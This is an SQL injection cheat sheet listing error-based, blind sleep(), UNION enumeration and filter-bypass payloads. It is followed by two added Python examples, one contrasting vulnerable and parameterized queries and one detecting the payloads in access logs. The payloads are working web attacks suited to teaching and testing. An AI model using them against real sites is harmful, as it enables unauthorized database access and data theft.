0xbit@home:~$

SQL Injection

SQL-Injection-cheat-sheet

First, try to figure out the vulnerable parameter.

NOTE: If it’s a GET request don’t forget to url encode the characters.

param='  --> try to get error

param="   --> try to get error

param=' or 1=1 --> try if it works

param=' or 1=0  --> check if it returns nothing

param=' and 1=1  --> check if this works or produces error

Try blind injection payloads if the commands above do not produce an error.

' or sleep(2) and 1=1#  --> try to get a delay; sleep() only runs when the rest of the condition requires it to be evaluated

' or sleep(2)#  --> try to get a delay

admin' and sleep(2)#  --> will delay only if the user admin exists

' union select sleep(2),null#  --> check if it produces a delay

' union select sleep(2),null,null,null,null#  --> check if it produces a delay, trying different numbers of columns

Try whether the queries above work when a comment is appended at the end.

param=' or 1=1#  --> try if it works

param=' or 1=1 --   --> try if it works (one space is needed after the --)

param=' or 1=1 //  --> try if it works

param= or 1=1#  --> try if it works

param=and or 1=1#  --> try if it works

param=' or 1=1-- sd  --> try if it works

' AND (select 1)=1 <-- this should give a TRUE response; subselects are supported
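The probing steps above only work because the parameter is pasted into the SQL text. Added example (not part of the original cheat sheet): a small Python script with an in-memory SQLite table, which is a constructed stand-in for the application's users table, runs the same GET parameter through a string-concatenated query and through a parameterized one, so you can see the error, the "or 1=1" tautology and the "or 1=0" empty result on the vulnerable path and the unchanged behaviour on the hardened path. SQLite uses -- rather than # for comments, so the -- variant of the payload is used. Function and table names are assumptions.

```python
import sqlite3
import urllib.parse


def make_db():
    # Constructed sample data standing in for the application's "users" table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                     [("papa", "hunter2"), ("admin", "s3cret")])
    conn.commit()
    return conn


def lookup_vulnerable(conn, param):
    # The bug: the request parameter is concatenated straight into the SQL text,
    # so a quote ends the string literal and what follows is parsed as SQL.
    sql = "SELECT id, name FROM users WHERE name = '" + param + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, param):
    # The fix: placeholder binding. The driver sends the value separately from
    # the query text, so quotes, comment markers and keywords stay plain data.
    sql = "SELECT id, name FROM users WHERE name = ?"
    return conn.execute(sql, (param,)).fetchall()


def probe(param_from_url):
    """Decode a GET parameter the way a web framework would, then run both variants.

    Returns (vulnerable_rows, hardened_rows). An exception from the vulnerable
    path is returned as the string "error" (the "try to get error" step above).
    """
    param = urllib.parse.unquote_plus(param_from_url)
    conn = make_db()
    try:
        vuln = lookup_vulnerable(conn, param)
    except sqlite3.Error:
        vuln = "error"
    hard = lookup_parameterized(conn, param)
    conn.close()
    return vuln, hard


if __name__ == "__main__":
    # Constructed inputs: a normal lookup, a lone quote, the tautology and the empty-set check.
    for raw in ("papa", "%27", "%27+or+1%3D1+--+", "%27+or+1%3D0+--+"):
        print(repr(urllib.parse.unquote_plus(raw)), "->", probe(raw))
```

The hardened function never errors and never returns more than the row whose name literally equals the submitted string, which is the behaviour a code reviewer should look for wherever request data meets a query.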

  • Now that we know the vulnerable parameter, let’s try guessing the table name:

' AND (select 1 from admin limit 0,1)=1 <-- FALSE

' AND (select 1 from users limit 0,1)=1 <-- TRUE  ======> Table found 'users'

  • Guessing columns:

' AND (select substring(concat(1,pass),1,1) from users limit 0,1)=1 <-- FALSE

' AND (select substring(concat(1,password),1,1) from users limit 0,1)=1 <-- TRUE    =====> Column 'password' found.

  • Now determine the number of columns in the current table

param=' or 1=1 order by 1#

param=' or 1=1 order by 10#

Let's say there are 3 columns.

  • Now determine the vulnerable columns, i.e. the columns that are visible

param=' or 1=0 union select null,null,null# --> if it produces no error, then try

param=' or 1=0 union select 1,2,3#  --> check which number shows in web page

Else try

param=' or 1=1 union select table_name,null,null from information_schema.tables#

if it produces error try table_name at other positions

Now, let's say columns 1 and 2 are shown on the web page.

  • To further enumerate

param=' or 1=0 union select table_schema,null,null from information_schema.columns#  --> display all database names

Note the 1=0 in the query above: it suppresses the original rows so that only the database names are shown.

param=' or 1=0 union select version(),null,null from information_schema.columns#  --> retrieve version

param=' or 1=0 union select @@version,null,null from information_schema.columns#  --> retrieve version in mssql

param=' or 1=0 union select substring(version(),1,1)=1,null,null from information_schema.columns#  --> return true if version is 1.x.x

param=' or 1=0 union select substring(version(),1,1)=5,null,null from information_schema.columns#  --> return true if version is 5.x.x

param=' or 1=0 union select substring(version(),3,1)=2,null,null from information_schema.columns#  --> return true if version is 5.2.x

param=' or 1=0 union select table_name,null,null from information_schema.columns#  --> display all table names

param=' or 1=1 union select table_name,null,null from information_schema.columns where table_schema='public'#  --> display tables inside the public database

param=' or 1=1 union select column_name,null,null from information_schema.columns where table_schema='public' and table_name='info'#  --> display all columns of the info table

param=' or 1=1 union select table_name as table,column_name as column,null from information_schema.columns#

Let's say the database name is public and the table name is info, with two columns in it, id and name.

param=' or 1=0 union select id,null,null from public.info#  --> display id column from table "info"

param=' or 1=0 union select id,name,null from public.info#  --> display id and name column from table "info"

param=' or 1=0 union select id,name,null from public.info where id='papa'#  --> display id and name of 'papa'
  • BYPASSING filters

We can use case switching or inline comments to bypass basic filters.

param=' or 1=0 UniOn selEct id,null,null FroM public.info#

param=' or 1=0 un/**/ion sele/**/ct id,null,null fr/**/om public.info#  --> works in mssql
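The case switching and /**/ splitting above are exactly what a naive keyword filter misses. Added example (not part of the original cheat sheet): a Python log scanner that normalizes each GET parameter before matching, so the mixed-case and comment-split payloads from this page collapse to the same string as the plain one. The access-log lines are constructed for the example, the rule names are assumptions, and the rules cover only the payload shapes shown on this page (tautology, UNION SELECT, sleep(), information_schema/version probes, comment terminators).

```python
import re
import urllib.parse

# Constructed sample access-log lines (not from a real system): one benign request,
# then the cheat sheet's payloads URL-encoded as they appear in a GET request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item?param=papa HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /item?param=%27+or+1%3D1%23 HTTP/1.1" 200 8192
10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "GET /item?param=%27+or+sleep%282%29%23 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /item?param=%27+or+1%3D0+UniOn+selEct+id%2Cnull%2Cnull+FroM+public.info%23 HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /item?param=%27+or+1%3D0+un%2F%2A%2A%2Fion+sele%2F%2A%2A%2Fct+id%2Cnull%2Cnull+fr%2F%2A%2A%2Fom+public.info%23 HTTP/1.1" 200 2048
"""

# Common/combined log format: client IP and the request target are all we need.
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Detection rules, applied to the normalized parameter value (rule names are assumptions).
RULES = {
    "tautology":    re.compile(r"['\"]\s*(?:or|and)\s+\S+\s*=\s*\S+"),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "time_delay":   re.compile(r"\bsleep\s*\("),
    "schema_probe": re.compile(r"\binformation_schema\b|@@version|\bversion\s*\("),
    "comment_tail": re.compile(r"['\"][^'\"]*(?:#|--|/\*)"),
}


def normalize(value):
    """Flatten the evasions the cheat sheet lists before any keyword matching."""
    # 1) undo leftover (including double) percent-encoding; parse_qsl already handled '+'
    for _ in range(3):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    # 2) drop inline /**/ comments used to split keywords such as un/**/ion
    value = re.sub(r"/\*.*?\*/", "", value)
    # 3) case-fold and squeeze whitespace so UniOn selEct matches union select
    return re.sub(r"\s+", " ", value.lower()).strip()


def classify(value):
    """Return the names of every rule the (normalized) value triggers."""
    norm = normalize(value)
    return [name for name, rx in RULES.items() if rx.search(norm)]


def scan(log_text):
    """Yield (ip, parameter, normalized value, rules) for each flagged parameter."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        query = urllib.parse.urlsplit(target).query
        for key, raw in urllib.parse.parse_qsl(query, keep_blank_values=True):
            rules = classify(raw)
            if rules:
                hits.append((ip, key, normalize(raw), rules))
    return hits


if __name__ == "__main__":
    for ip, key, norm, rules in scan(SAMPLE_LOG):
        print(f"{ip} {key}={norm!r} -> {', '.join(rules)}")
```

Normalizing first is the design choice that matters: the fourth and fifth log lines produce byte-identical normalized values and the same rule list, even though one is mixed-case and the other is comment-split, so an alert on either looks the same to the analyst.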